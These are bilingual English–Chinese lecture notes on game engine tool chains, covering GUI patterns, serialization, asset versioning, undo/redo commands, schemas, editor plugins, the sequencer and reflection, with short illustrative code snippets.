    ​缺点

    • Poor scalability

      可扩展性差

    • Poor performance

      性能差

    • Poor maintainability

      可维护性差

    Examples

    ​示例

    • Unity UGUI
    • Omniverse GUl
    • Piccolo GUl

    Retained Mode

    ​保留模式

    webp

    • The graphics library, instead of the client retains the scene to be rendered.

      图形库,而不是客户端保留要渲染的场景。

    • The client calls into the graphics library do notdirectly cause actual rendering, but make useof extensive indirection to resources, managedby the graphics library.

      客户端调用图形库不会直接导致实际渲染,而是利用图形库管理的大量间接资源。

    HorizontalLayout layout = new HorizontalLayout();
    Button button = new Button();
    button.setText("Hello!");
    button.setwidth(12);
    button.setHeight(24);
    button.setcallback(&callback_func);
    layout.Add(button);

    webp

    Characteristic

    ​特点

    • Object-oriented

      面向对象

    • Widgets contain their own state and data

      小部件包含自己的状态和数据

      • Draw widgets as needed

        根据需要绘制小部件

      • Complicated effects (animation et.al.)

        复杂效果(动画等)

    Pros

    ​优点

    • High scalability

      高可扩展性

    • High performance

      高性能

    • High maintainability

      高可维护性

    Cons

    ​缺点

    • Complex for developers

      对开发人员来说很复杂

      • Message queue / callbacks

        消息队列 / 回调

      • Synchronization between GUI and application

        GUI 和应用程序之间的同步

    Design Pattern-MVC

    webp

    ​用户借助 Controller 操作 Model,Model 更新 View 给用户看。

    Invented by Trygve Reenskaug in 1978, to bridge the gap between the human user’s mental model and the digital model that exists in the computer.

    ​由 Trygve Reenskaug 于 1978 年发明,用于弥合人类用户的心理模型与计算机中存在的数字模型之间的差距。

    Model: The central component of the pattern, responsible for managing the dataof the application.

    模型:模式的核心组件,负责管理应用程序的数据。

    View: Any representation of information such as a chart, diagram or table.

    视图:任何信息表示形式,例如图表、图解或表格。

    Controller: Accepts input and converts it to commands for the model or view.

    控制器:接受输入并将其转换为模型或视图的命令。

    Design Pattern-MVP

    The evolution of the MVC design pattern, wherein the controller is replaced by the presenter.

    ​MVC 设计模式的演变,其中控制器被演示者取代。

    webp

    ​不同于 MVC,这次使用双向箭头。

    Model: An interface defining the data to be displayed or otherwise acted upon in the user interface.

    模型:定义要在用户界面中显示或以其他方式执行的数据的接口。

    View: A passive interface that displays data (the model) and routes user commands (events) to thepresenter to act upon that data.

    视图:显示数据(模型)并将用户命令(事件)路由到演示者以对该数据执行操作的被动接口。

    Presenter: Acts upon the model and the view. lt retrieves data from repositories (the model), andformats it for display in the view.

    演示者:对模型和视图执行操作。它从存储库(模型)检索数据,并将其格式化以在视图中显示。

    Design Pattern-MVVM

    A variation of Model / View / Controller (MVC)

    webp

    In MVVM,View is the responsibility of a designer rather than a classic developer.

    ​在 MVVM 中,View 是设计师而非传统开发人员的职责。

    The designer is generally a more graphical,artistic focused person, and does lessclassic coding than a traditional developer.

    ​设计师通常更注重图形和艺术,与传统开发人员相比,他们较少进行传统编码。

    webp

    View: using a WYSlWYG tool such as Dreamweaver, VS Blend and save as html/xaml , view state that MVC encodes in its View classes is not easy to represent.

    View:使用 Dreamweaver、VS Blend 等所见即所得工具并保存为 html/xaml,MVC 在其 View 类中编码的视图状态不易表示。

    Binding: bind View Data to the Model ,no more code in View classes.

    Binding:将 View 数据绑定到 Model,View 类中不再有代码。

    ViewModel-Model of View: The Model is very likely to have a data types that cannot be mapped directly to controls,ViewMlodel contains data-transformers that convert Model types into View types.

    ViewModel-View 的模型:Model 很可能具有无法直接映射到控件的数据类型,ViewMlodel 包含将 Model 类型转换为 View 类型的数据转换器。


    Pros

    ​优点

    • Independent development

      独立开发

    • Easy to maintain and test

      易于维护和测试

    • Easy to reuse components

      易于重用组件

    Cons

    ​缺点

    • For simple UI, MVVM can be overkill

      对于简单的 UI,MVVM 可能有点过头了

    • Data-binding is declarative and harder to debug

      数据绑定是声明性的,更难调试

    Serialization and Deserialization

    ​序列化与反序列化

    webp

    Serialization is the process of translating a data structure or object state into a format that can be stored (for example, in a file ormemory data buffer) or transmitted (for example, over a computer network) and reconstructed later.

    ​序列化是将数据结构对象状态转换为可存储(例如,在文件或内存数据缓冲区中)或传输(例如,通过计算机网络)并在稍后重建的格式的过程。

    Deserialization is the opposite operation,extracting a data structure from a series ofbytes.

    反序列化是相反的操作,从一系列字节中提取数据结构。

    Text Files

    webp

    ​使用文本文档设计的对象数据结构。

    • Save data as text files
    • Example: TXT, Json, YAML, XML…
    • Can read by common text editors

    Engine applications:

    • Unity Editor(optional): subset of YAML
    • Piccolo: Json
    • Cryengine: XML/Json (optional)

    Binary Files

    webp

    • Save data as bytes stream

      将数据保存为字节流

    • Need additional tools for read/write

      需要额外的读/写工具

    • Example: UAsset, FBX Binary

      示例:UAsset、FBX 二进制

    Engine applications:

    • Unity Runtime, Unity Editor (optional 可选)
    • CryEngine (optional 可选)
    • Unreal: UAsset

    Storage Comparison -Text vs. Binary

    ​存储比较 - 文本与二进制

    webp

    ​文本可读性好但是占用空间大,读取速度慢。二进制体积小,性能好但是可读性差,不便于调试。

    Asset Data Repeatance

    ​资源数据重复

    webp

    Meshes which in the red boxes are redundant data.

    ​红框内的网格是冗余数据。

    How do game developers solve the problem?

    ​游戏开发者如何解决这个问题?

    Asset Reference

    ​资产引用

    webp

    Assets Reference is a way to separate redundant data into asset files and complete association by establishing reference relationships.

    ​资产引用是一种将冗余数据分离到资产文件中,通过建立引用关系完成关联的方式。

    Object instance in Scene

    ​场景中的对象实例

    webp

    Data instance is a way to create a parent data that you can use as a base to make a wide variety of different children and can also be used directly.

    数据实例是一种创建父数据的方法,您可以将其用作基础来制作各种不同的子数据,也可以直接使用。

    Object instance Variance

    ​对象实例变化

    webp

    How to change the texture of Ground1 from stone to castle stone?

    ​如何将 Ground1 的纹理从石头更改为城堡石头?

    Build Variance by Copying

    ​通过复制构建差异

    webp

    Intuitive way: make a copy of instance data, modify the copy

    ​直观的方式:复制实例数据,修改副本

    • add lots of reduntant data

      添加大量冗余数据

    Build Variance by Data Inheritance

    ​通过数据继承构建差异

    webp

    Data lnheritance: lnherit the data of the inherited object and allow overriding assignments to thedata defined in its data structure.

    数据继承:继承继承对象的数据并允许覆盖其数据结构中定义的数据的分配。

    How to Load Asset-Deserialization

    ​如何加载资产反序列化

    Parse Asset File

    ​解析资产文件

    webp

    How to know how to instantiate A or fields?——Store the type of A and fields

    ​如何知道实例化 A 或字段?——存储 A 和字段的类型

    Build Key-Type-Value Pair Tree

    ​构建键-类型-值对树

    webp

    Binary vs. Text

    ​二进制与文本

    webp

    Where to store the objects and fields type?

    ​将对象和字段类型存储在哪里?

    • Text: store in asset

      文本:存储在资产中

    • Binary: store in a table

      二进制:存储在表中

    Endianness

    ​不同的硬件架构有不同的字节序。

    webp

    Big Endian: begin with most significant byte end with least significant byte

    ​大端序:以最高有效字节开始,以最低有效字节结束

    Little Endian: begin with least significant byte end with most significant byte

    ​小端序:以最低有效字节开始,以最高有效字节结束

    Endianness vary among different processors

    ​不同处理器的字节序各不相同

    ProcessorEndianness
    PowerPC (PPC)Big Endian
    Sun SparcBig Endian
    IBM S/390Big Endian
    Inel x86 (32 bit)Little Endian
    Intel x86_64 (64 bit)Little Endian
    ARMBi (Big / Little) Endian

    Unreal:

    /**
    Returns true if data larger than 1 byte shouldbe swapped to deal with endian mismatches.
    如果应交换大于 1 字节的数据来处理字节序不匹配问题,则返回 true。
    */
    FORCEINLINE bool IsByteSwapping()
    {
    #if PLATFORM LITTLE ENDIAN
    bool SwapBytes = ArForceByteSwapping;
    #else
    bool SwapBytes = this->IsPersistent();
    #endif
    return SwapBytes;
    }

    Asset Version Compatibility

    ​资源版本兼容性

    webp

    Add or Remove Field

    ​添加或删除字段

    origin class:

    class GameObject
    {
    private:
    GUID guid;
    string name;
    Transform transform;
    }

    old data:

    {
    "guid": "092xtwg2u4ik1359",
    "name":"Alice",
    "transform": {
    "position": {
    "x": 0,
    "y": 0,
    "Z": -0.1
    }
    "rotate": {},
    "scale": {
    "x": 1,
    "y": 1,
    "z": 1
    }
    }
    }

    updated class 1

    class Gameobject
    {
    private:
    GUID guid;
    string name;
    }

    updated class 2

    class Gameobject {
    private:
    GUID guid;
    string name;
    Transform transform;
    BoundingBox bbox;
    }

    Solve Compatibility by Version Hardcode

    ​通过版本硬编码解决兼容性问题

    Unreal: add version to asset

    ​Unreal:将版本添加到资产

    • Load asset: check if field exists then load data

      加载资产:检查字段是否存在,然后加载数据

    • Save asset: write all data to asset file

      保存资产:将所有数据写入资产文件

    class Gameobject:
    int x = default;
    float y= default;
    bool z= default; // new field

    function Deserialize(data):
    x = data.GetValue<int>("x");
    y = data.GetValue<float>("y");
    if(GetCurrentVersion() >= data.version){
    z= data.GetValue<bool>("z");
    }

    function Serialize(data):
    data.SetValue<int>("x", x);
    data.setValue<float>("y", y);
    data.SetValue<bool>("z" z);
    data.UpdateVersion(GetcurrentVersion());

    Solve Compatibility by Field UID

    ​通过字段 UID 解决兼容性问题

    Google protocol buffers:

    ​Google 协议缓冲区:

    ​unique number for field

    ​字段的唯一编号

    • Every field has a unique number, never change the number.

      每个字段都有一个唯一编号,永远不要更改该编号。

    • Serialization:

      序列化:

      1. For every field, generate a “key” (fixed size) according toits field number and type.

        对于每个字段,根据其字段编号和类型生成一个“键”(固定大小)。

      2. Store field data with key, key is stored in the first few bytes

        使用键存储字段数据,键存储在前几个字节中

    • Deserialization:

      反序列化:

      1. Field not in schema but in data:key would not be recognized, skip the field.

        字段不在架构中但在数据中:键将无法识别,跳过该字段。

      2. Field in schema but not in data: set default value.

        字段在架构中但不在数据中:设置默认值。

    message PrefabobjectBinary{
    string guid = 1;
    string_file_name = 2;
    repeated string_game_object_guid_list = 3;
    }

    webp

    How to Make a Robust Tools

    ​如何制作一个鲁棒的游戏引擎?

    • Undo & Redo

      要有 Ctrl + Z 和 Ctrl + Y 的功能

    • Crash Recovery

      程序崩溃时能够回档

    Command

    webp

    • Abstract all user operations to atomic commands which can invoke, revoke and serialize, deserialize.

      将所有用户操作抽象为可以调用、撤销、序列化、反序列化的原子命令。

    Command-Definition

    • ICommand<TData> provide a basic abstraction of the command.

      ICommand<TData> 提供命令的基本抽象。

    • Every system (which want to support undo/redo/crash recory …) needs to implement the system related commands inherantanced from lCommand<TData>.

      每个系统(想要支持撤消/重做/崩溃恢复…)都需要实现从 lCommand<TData> 继承的系统相关命令。

    public interfaceICommand<TData>
    {
    long UID { get; set; }
    TData Data { get; set;}
    void Invoke();
    void Revoke();
    byte[] Serialize();
    void Deserialize(byte[] data);
    }

    Command-UID

    Commands need strictly follow the sequence when recovery from disk

    ​从磁盘恢复时命令需要严格遵循顺序

    • Monotonic increase over time

      随时间单调增加

    • Unique identification

      唯一标识

    Command Serialize and Deserialize

    ​命令序列化和反序列化

    • Provide functions to serialize command instance to data and deserialize data to command instance.

      提供将命令实例序列化为数据和将数据反序列化为命令实例的函数。

    • TData type needs to provide serialize anddeserialize interface.

      TData 类型需要提供序列化和反序列化接口。

    Three key Commands

    ​三个关键命令

    • Add

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Create a runtime instance with data

        使用数据创建运行时实例

      • Revoke: Delete the runtime instance

        删除运行时实例

    • Delete

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Delete the runtime instance

        删除运行时实例

      • Revoke: Create a runtime instance with data

        使用数据创建运行时实例

    • Update

      • Data: Usually data is the old and new values of the modified properties of the runtime instance andtheir property names

        通常数据是运行时实例修改属性的新旧值及其属性名称

      • Invoke: Set the runtime instance property to the new value

        将运行时实例属性设置为新值

      • Revoke: Set the runtime instance property to the old value

        将运行时实例属性设置为旧值

    How to Make Tool Chain

    Various Tools for Different Users

    webp

    • Different viewes for different tools

      不同工具有不同的视图

    • Each tool has it’s owner datastructure

      每个工具都有其所有者数据结构

    • Same data may have different view for different user

      同一数据可能对不同用户有不同的视图

    Develop all Tools Seperately?

    ​单独开发所有工具?

    Simplest Way

    ​最简单的方法

    • No Scalability

      没有可扩展性

    • No maintainbility

      没有可维护性

    Find Common Building Blocks

    ​寻找共同的构建块

    webp

    Any complex structure is made up of simple structures, we just need a standard language to describe it.

    ​任何复杂的结构都是由简单的结构组成的,我们只需要一种标准的语言来描述它。

    Schema-A Description Structure

    ​Schema-A 描述结构

    webp

    A data schema is the formal description of the structures your system is working with.

    数据模式是系统正在使用的结构正式描述

    Standardizing the world description language

    ​标准化世界描述语言

    • Unified the data processor

      统一数据处理器

    • Normalized data between different tools

      不同工具之间的标准化数据

    • Ability to automatically generate standardized Ul

      能够自动生成标准化 UI

    Schema-Basic Eements

    ​Schema-基本元素

    webp

    Abstraction of the basic building block of the world

    ​世界基本构成块的抽象

    • Atomic Types: Int, Float, Double …

      原子类型:Int、Float、Double…

    • Class Type: Use atomic types to present complex data structure

      类类型:使用原子类型呈现复杂的数据结构

    • Containers: Array, Map

      容器:Array、Map

    Schema-Inheritance

    Abstraction of the inheritance relationship of the world

    ​世界继承关系的抽象

    webp

    class A {/*...*/};
    class B:A {/*...*/};
    class C:A {/*...*/};

    Schema-Data Reference

    Abstract of the reference relationship of the world

    ​世界引用关系的抽象

    webp

    In the code, we need to read the data through the file path and instantiate it into the corresponding file class.

    ​在代码中我们需要通过文件路径读取数据,并实例化成对应的文件类。

    Schema - 2 Definition Ways

    webp

    Standalone schema definition file

    ​独立的架构定义文件

    Pros

    ​优点

    • Comprehension easily

      易于理解

    • Low coupling

      低耦合

    Cons

    ​缺点

    • Ease to mismatch between engine version and schema version

      引擎版本和架构版本容易不匹配

    • Difficult to define function in the structure

      难以在结构中定义函数

    • Need to implement complete syntax

      需要实现完整的语法

    Defined in code

    ​在代码中定义

    Pros

    ​优点

    • Ease to accomplish Function reflection

      易于实现函数反射

    • Natural support for inheritance relationships

      自然支持继承关系

    Cons

    ​缺点

    • Difficult to understand

      难以理解

    • High coupling

      高耦合

    Three Views For Engine Data

    webp

    ​数据以三个形式存在:存储器中、运算器中,还要便于用户理解。

    Runtime View

    ​运行时视图

    Focus:

    ​重点:

    • Read at a faster speed

      以更快的速度阅读

    • Calculate at a faster speed

      以更快的速度计算

    class RuntimeSpotlight
    {
    public:
    // Spot Light Translation Matrix
    Matrix4x4 light trans {Matrix4x4::IDENTITY};
    // Spot Light Cone
    float inner_cone_radian = 0.0f;
    float outer_cone radian = 0.0f;
    // Spot Light intensity and units
    float intensity = 0.0f;
    LightUnits unit= CANDELA;
    // Spot Light Color
    Vector4 light color {Vector4::ZERO};
    // other light data like shadow...
    }

    Storage View

    Focus:

    ​重点:

    • Write at a faster speed

      写入速度更快

    • Occupies less hard disk space

      占用更少的硬盘空间

    "Position:X": 1.0,
    "Position:Y": 1.0,
    "Position:Z": 1.0
    "Rotation:X": 0.0,
    "Rotation:Y": 0.0,
    "Rotation:Z": 0.0,
    "Rotation:W" : 1.0,
    "Scale:X": 1.0,
    "Scale:Y": 1.0,
    "Scale:Z": 1.0,
    // cone degree
    "inner cone_degree": 30,
    "outer cone_degree": 60,
    //sds
    "intensity": 0.0,
    "unit": 1
    //other data..

    Tools View

    webp

    Focus:

    ​重点:

    • More understandable form

      更易理解的形式

    • The need for multiple editing modes

      需要多种编辑模式

    Other Point:

    ​其他点:

    Tool data does not generally exists. Usually, special processing is done when the UI interface is generated

    ​工具数据一般不存在,通常在生成 UI 界面时进行特殊处理

    Tools View - Understandable

    webp

    ​比如,计算中使用弧度,但给用户一般使用角度。

    Too View-Various Editor Nodes

    ​Too View-各种编辑器节点

    webp

    Different edit mode for groups with different needs

    ​针对不同需求的群体提供不同的编辑模式

    What You See is What You Get (WYSIWYG)

    ​所见即所得

    User Friendly for Artists

    User Friendly for Designer

    Stand-alone Tools

    webp

    Stand-alone Tools is a kind of tool that canrun independently of the engine.

    独立工具是一种可以独立于引擎运行的工具。将 Tool Layer 与其他层并列。

    Pros

    ​优点

    • Suitable for use as a DCC tool plug-in

      适合用作 DCC 工具插件

    • Easy to start developing tools

      易于上手开发工具

    Cons

    ​缺点

    • Difficult to achieve WYSIWYG

      难以实现所见即所得

    In Game Tools

    webp

    In Game Tools is a kind of tool based on engineruntime system work.

    游戏内工具 是一种基于引擎运行时系统工作的工具。将 Tool Layer 置于顶层。

    Pros

    ​优点

    • Access to all engine data directly

      直接访问所有引擎数据

    • Easy to preview the game in the editor

      易于在编辑器中预览游戏

    • Easy to make live in-game editing

      易于进行实时游戏内编辑

    Cons

    ​缺点

    • Complex engine architecture

      引擎架构复杂

    • Requires a complete engine Ul system to makethe editor Ul

      需要完整的引擎 UI 系统才能制作编辑器 UI

    • When the engine is crashing, the tools become unusable as well

      当引擎崩溃时,工具也会变得无法使用

    In Game Tools-Editor Mode

    ​游戏工具-编辑器模式

    webp

    Editor Mode: Support to modify and preview scene data

    编辑器模式:支持修改和预览场景数据(如 Unity 在运行时调试)

    • Real time preview of scene data modification

      实时预览场景数据修改

    • Logic systems do not tick, so there are more hardware resources to display more scene details

      逻辑系统不勾选,因此有更多的硬件资源来显示更多的场景细节

    Play in Editor (PIE)

    ​在编辑器中玩游戏 (PIE)

    PIE: Directly play game in editor, no need to close editor and start game mode

    PIE:直接在编辑器中玩游戏,无需关闭编辑器并启动游戏模式

    • Save loading time

      节省加载时间

    • The continuity of creation is maintained

      保持创作的连续性

    • Quickly test modifications

      快速测试修改

    Two implemation ways

    ​两种实现方式

    • Play in editor world: Start gameplay systems tick in editor world and play in it

      在编辑器世界中玩游戏:在编辑器世界中启动游戏系统并在其中玩游戏

    • Play in PIE world: Duplicate editor world to create a PlE world and play in it

      在 PIE 世界中玩游戏:复制编辑器世界以创建 PlE 世界并在其中玩游戏

    PIE Mode -Play in Editor World

    ​PIE 模式 - 在编辑器世界中游戏

    webp

    Pros

    ​优点

    • Easy architecture tools layer

      简单的架构工具层

    • Quick state change

      快速状态更改

    Cons

    ​缺点

    • Game mode may cause data changes

      游戏模式可能导致数据更改

    Example

    ​示例

    • Piccolo

    PIE Mode -Play in PIE World

    ​PIE 模式 - 在 PIE 世界中游戏

    webp

    Pros

    ​优点

    • Data separation

      数据分离

    • Easy to instantiate multiple game instances Cons

      易于实例化多个游戏实例

    Cons

    ​缺点

    • Architecture complex

      架构复杂

    Example

    • Unreal

    One More Thing - Plugin

    ​还有一件事 - 插件

    ​游戏引擎开发者不可能顾虑到所有可能的游戏开发情况,允许插件扩展游戏引擎的功能。

    Extensibility

    ​可扩展性

    Different games need different customization of engine tools.

    ​不同的游戏需要对引擎工具进行不同的定制。

    Engine tools use plug-in mechanism to satisfy the needs.

    ​引擎工具使用插件机制来满足需求。

    Plug-in-Showcases

    webp

    Plug-in - Framework

    webp

    Plug-in : A software component that adds a specific feature to an existing computer program.

    插件:为现有计算机程序添加特定功能的软件组件。

    PluginManager: Manage plugin loading and unloading.

    PluginManager:管理插件的加载和卸载。

    Interface: A series of abstract classes provided to plug-ins, plug-ins can choose to instantiate different classes to realize the development of corresponding functions.

    Interface:提供给插件的一系列抽象类,插件可以选择实例化不同的类来实现相应功能的开发。

    API: A series of functions exposed by the engine, plug-ins can use functions to execute the logic what we want.

    API:引擎暴露出来的一系列函数,插件可以使用这些函数来执行我们想要的逻辑。

    Plug-in-Add a Toolbar Button

    ​插件-添加工具栏按钮

    webp

    Plug-in -Add a Plug-in Menu in Unreal5

    webp

    Plug-in-Summary

    ​插件概述

    webp

    The meaning of plug-in framework

    ​插件框架的意义

    • Extend editor functionality

      扩展编辑器功能

    • Ease to hot update as decoupling

      解耦,方便热更新

    • Facilitate the construction of engine development ecology

      方便引擎开发生态的构建

    Plug-in framework requirements

    ​插件框架要求

    • Full API support

      完整的 API 支持

    • Common interface support

      通用接口支持

    References

    ​参考文献

    第十四节:引擎工具链高级概念与应用

    Glance of Game Production

    ​游戏制作概览

    whether to work on the environment, the animation, to place characters or to create missions.

    ​是在环境,动画中工作,放置角色还是创建任务

    Adapt to Different Game Genres

    ​适应不同的游戏类型

    webp

    Challenges from Real Production

    ​真实游戏开发中的挑战。

    webp

    ​在游戏开发中:

    • Massive various data from DCC and engine tools

      大量来自 DCC 和发动机工具的各种数据

    • Artist, designer and programmer with different mindsets

      艺术家,设计师和具有不同心态的程序员

    • WYSIWYG is must for highquality production

      所见即所得,必须高质量生产

    World Editor-A hub for everything to build the world

    ​世界编辑 - A Hub供所有建立世界的枢纽

    webp

    ​Unreal 为游戏开发者提供的界面。

    Editor Viewport: A Special Version of Game Engine

    ​编辑器视口:游戏引擎的特殊版本

    • Main window of interaction between designers and game world

      设计师与游戏世界之间的互动主窗口(便于设计师 Debug 用的互动窗口)

    • Powered by a full game engine in special "editor” mode

      由特殊“编辑”模式的完整游戏引擎提供动力

    • Provides a variety of special gadgets and visualizers for editing

      提供各种用于编辑的特殊小工具和可视化器

    WARNING: Editor-only code must be moved out of released game!

    ​警告:仅编辑代码必须从发布的游戏中移出!

    Everything is an Editable Object

    ​一切都是一个可编辑的对象

    webp

    • The editing requirements of all objects in the editor world are mostly the same, such as moving, adjusting parameters, etc

      编辑世界中所有对象的编辑要求大多是相同的,例如移动,调整参数等

    Different Views of Objects

    ​对象的不同视图

    • Display all of the objects within the scene

      显示场景中的所有对象

    • Organize objects in different views for user conveniences

      在不同视图中组织对象的用户便利

    webp

    Tree view

    webp

    Categories and groups

    Schema-Driven Object Property Editing

    ​模式驱动的对象属性编辑

    webp

    • Displays all of the editable properties for the selected objects

      显示所选对象的所有可编辑属性

    • Beyond schema, we can define some customized editing utilities for different types

      除了模式之外,我们还可以为不同类型的对象定义一些自定义的编辑实用程序

    Content Browser

    ​内容浏览器

    webp

    • Provide intuitive thumbnail of all assets

      提供所有资产的直观缩略图

    • Share asset among different projects

      在不同项目之间共享资产

    • Evolution of asset management from static file folder to content “ocean”

      资产管理从静态文件夹演变为内容“海洋”

    Editing Utilities in World Editor

    ​世界编辑器中的编辑实用程序

    webp

    ​便于用户编辑游戏对象的图示。

    Mouse Picking

    ​鼠标拾取

    Ray Casting

    射线投射

    webp

    Pros:

    • No cache required

      无需缓存

    • Can support multiple objects on selected rays

      可以支持选定射线上的多个对象

    Cons:

    • Poor query performance

      查询性能较差

    RTT

    webp

    Pros:

    • Easy to implement range queries

      易于实现范围查询

    • Ability to complete queries quickly

      能够快速完成查询

    Cons:

    • Need to draw an extra picture

      需要绘制额外的图片

    • Obstructed objects cannot be selected

      无法选择被遮挡的物体

    Object Transform Editing

    webp

    ​游戏引擎要便于用户对 Object 作 Transform Editing。

    Terrain

    webp

    Landform

    ​地形

    • Height map

      高度图

    Appearance

    ​外观

    • Texture map

      纹理图

    Vegetation

    ​植被

    • Tree instances

      树木实例

    • Decorator distribution map

      装饰器分布图

    Height Brush

    ​高度画笔

    webp

    • Draw height map to adjust terrain mesh

      绘制高度图以调整地形网格

      • Height change needs to be natural and smooth

        高度变化需要自然流畅

      • Can be easily adjusted to the desired results

        可以轻松调整到所需效果

        • Customized brush

          自定义画笔

    Instance Brush

    webp

    ​实例画笔(给地标种树)

    Pros:

    • Instance position is fixed

      实例位置固定

    • Available to further modification

      可进一步修改

    Cons:

    • Large amount of data

      数据量大

    Environment

    ​环境

    webp

    • Sky

      天空

    • Light

      灯光

    • Roads

    • Rivers

      河流

    From up to down, environment around us present a live world to the player. Edit these environment elements would also be important.

    ​从上到下,我们周围的环境为玩家呈现了一个生动的世界。编辑这些环境元素也很重要。

    Environment - Rule System

    webp

    ​有了这些规则更好地让用户创建合理的地形环境。

    Rules:

    ​规则:

    • Tree will not grow beside objects.

      树不会在物体旁边生长。

    • Tree will not grow in water.

      树不会在水中生长。

    • Tree will not grow on roads.

      树不会在道路上生长。

    Conclusion:

    ​结论:

    • Rule system handling data changes.

      规则系统处理数据变化。

    • Decoupled Environment systems.

      解耦环境系统。

    Editor Plugin Architecture

    ​编辑器插件架构

    Examples of Plug-in Module in Commercial Softwares

    ​商业软件中的插件模块示例

    webp

    A Cross Matrix between Systems and Objects

    ​系统与对象之间的交叉矩阵

    webp

    Any system and object type could be plug-ins to Editors

    ​任何系统和对象类型都可以成为编辑器的插件

    Combination of Multiple Plugins

    ​多种插件架构

    webp

    Covered

    ​覆盖

    • Only execute the newly registered logic, skip the original logic

      仅执行新注册的逻辑,跳过原始逻辑

    • Ex. Terrain editing overwrite

      例如地形编辑覆盖

    webp

    Distributed

    ​分布式

    • Each plugin will be executed, and if there is an output, the results will eventually be merged

      每个插件都会被执行,如果有输出,结果最终会被合并

    • Ex. Most special system editing seperately

      例如大多数特殊系统都是单独编辑的

    webp

    Pipeline

    ​管道

    • Input and output are connected to each other, generally input and output are the same data type

      输入和输出相互连接,通常输入和输出是相同的数据类型

    • Ex.Asset preprocessing, geometry for physics

      例如资产预处理、物理几何

    webp

    Onion rings

    ​洋葱圈

    • On the basis of the pipeline, the core logic of the system is in the middle, and the plug-in pays attention to the logic of entering and exiting at the same time

      在管线的基础上,系统的核心逻辑在中间,插件同时关注进入和退出的逻辑

    • Ex. Road editing plugin with terrain plugin

      Ex. 道路编辑插件与地形插件

    One More Thing-Version Control

    ​还有一件事-版本控制

    A certain version relationship is required between the plug-in and the host application to ensure that they can work together normally.

    ​插件和宿主应用之间需要有一定的版本关系,才能保证它们能够正常协同工作。

    • Plug-in use the same version number with the host application

      插件使用与宿主应用相同的版本号

    • Plug-in use the version number of the plug-in interface

      插件使用插件接口的版本号

      • This is more recommended because the update frequency of the plug-in interface and thesoftware may be different

        这是比较推荐的做法,因为插件接口和软件的更新频率可能不一样

    Design Narrative Tools

    ​设计叙述工具

    Storytelling in Game Engine

    ​游戏引擎中的故事叙述

    Control many parameters variance in the timeline

    ​控制时间轴中的许多参数变化

    webp

    Sequencer

    ​序列发生器(做动画的软件里常有)

    webp

    • Track: ln order to reference actors in your sequence. Any character, prop, camera, effect, or othelactors can be referenced and manipulated in Sequencer

      轨道:为了引用序列中的演员。任何角色、道具、摄像机、效果或其他演员都可以在 Sequencer 中引用和操纵

    • Property Track: Property of reference actors in track

      属性轨道:轨道中引用演员的属性

    • Timeline: A line describing time in discrete frames

      时间轴:描述离散帧中时间的线

    • Key Frame: The key fames can manipulate properties. Upon reaching a key frame in the timeline the track’s properties are updated to reflect the values you have defined at that point

      关键帧:关键帧可以操纵属性。到达时间轴中的关键帧后,轨道的属性将更新以反映您在该点定义的值

    • Sequence: Sequencer’s data

      序列:Sequencer 的数据

    Sequencer-Bind Objects to Track

    ​序列器-将对象绑定到跟踪

    webp

    How to let the sequencer control my “chick”

    ​如何让音序器控制我的“小鸡”

    • Bind the “chick” to Track

      将“小鸡”绑定到轨道

    Sequencer-Bind Object Property to Property Track

    ​Sequencer-将对象属性绑定到属性轨道

    How to control the moving position of the “chick”

    ​如何控制“小鸡”的移动位置

    • Bind position property toproperty track

      将位置属性绑定到属性轨道

    Sequencer-Set Key Frame

    ​Sequencer-设置关键帧

    How to make an “chick” reach a specified position

    ​如何让“小鸡”到达指定位置

    Sequencer-Set Key Frames

    ​序列器设置关键帧

    A, B, C, D are key frames.

    ​A、B、C、D 是关键帧。

    How “chick” go from A to B to C to D

    ​“小鸡”如何从 A 到 B 再到 C 再到 D

    webp

    Sequencer-Interpolate Properties along Key Frames

    ​Sequencer-沿关键帧插入属性

    Similar to animation, set key frames

    ​与动画类似,设置关键帧

    webp

    Reflection and GamePlay

    Reflection is Foundation of Sequencer

    ​反射是 Sequencer 的基础

    webp

    Any data in game engine can be bind into track based on reflection system

    ​游戏引擎中的任何数据都可以根据反射系统绑定到轨道中

    Complexity of Game Play

    Visual Scripting System

    webp

    ​可视化编程系统,如蓝图。

    Hard Code Method for More Feature

    ​硬编码方法实现更多功能,但是代码也更复杂。

    class Human: public object{
    void Jump() {
    // do something ...
    }
    void StopJump() {
    // do something ...
    }
    }
    void CallFunction(object* instance, string type_name, string func_name)
    {
    if (type_name == "Human") {
    Human* human = (Human*)instance;
    if (func_name == "Jump") {
    human->Jump();
    }
    else if(func_name == "StopJump"){
    human->StopJump();
    }
    }
    }

    A Common Solution - Reflection

    ​常见解决方案 - 反射

    In computer science, reflective programming or reflection is the ability of a process to examine, introspect and modify its own structure and behavior.

    ​在计算机科学中,反射编程或反射是指进程检查、自省和修改自身结构和行为的能力。

    ​现在高级的语言编程都有反射的设计。

    JAVA Reflection

    package Demo;
    public class Test {
    public int m_filed;
    public void print()
    {
    System.out.print("call print().");
    };
    }
    package Demo;
    import java.lang.refelect.Field;
    import java.lang.refelect.Method;
    public class Demo {
    public static void main(String[] args) throws Exception {
    Class<?> cls = Class.forName("Demo.test");
    Object obj = cls.getConstructor().newInstance();
    Field filed_accessor = cls.getField("m_filed");
    filed_accessor.set(obj, 2);

    Method method_accessor = cls.getMethod("print");
    method_accessor.invoke(obj);
    }
    }

    Reflection Build the Bridge between Code and Tools

    ​反射在代码和工具之间搭建桥梁

    Using reflection to generate a code meta information map

    ​使用反射生成代码元信息图

    • class_name, func_name and para_name

    • generate accessor and invoker

      生成访问器和调用器

    class Human: public Object {
    void Jump() {
    // do something ...
    }

    void StopJump() {
    // do something ...
    }
    }
    void callFunction(object* instance, string type_name, string func_name)
    {
    FunctionPtr function_ptr = FunctionInfoMap::getInvokefunction(instance, type_name, func_name);
    function ptr->invoke();
    }

    How to Implement Reflection in C++

    ​如何在 C++ 中实现反射

    • Collect type info from code

      从代码中收集类型信息

    • Generate code to provide accessors for fields and methods

      生成代码以提供字段和方法的访问器

    • Manage all accessors with a <string,accessor> map

      使用 <string,accessor> 映射管理所有访问器

    How to Get Type Info from Code

    ​如何从代码中获取类型信息

    General Programming Language (GPL) Compilation Process

    ​通用编程语言 (GPL) 编译过程

    webp

    Abstract Syntax Tree (AST): An abstract representation of the syntax structure of source code. It represents the syntax structure of programming language in the form of a tree, and each node in the tree represents a construct in the source code.

    抽象语法树(AST):源代码语法结构的抽象表示。它以树的形式表示编程语言的语法结构,树中的每个节点代表源代码中的一个构造。

    webp

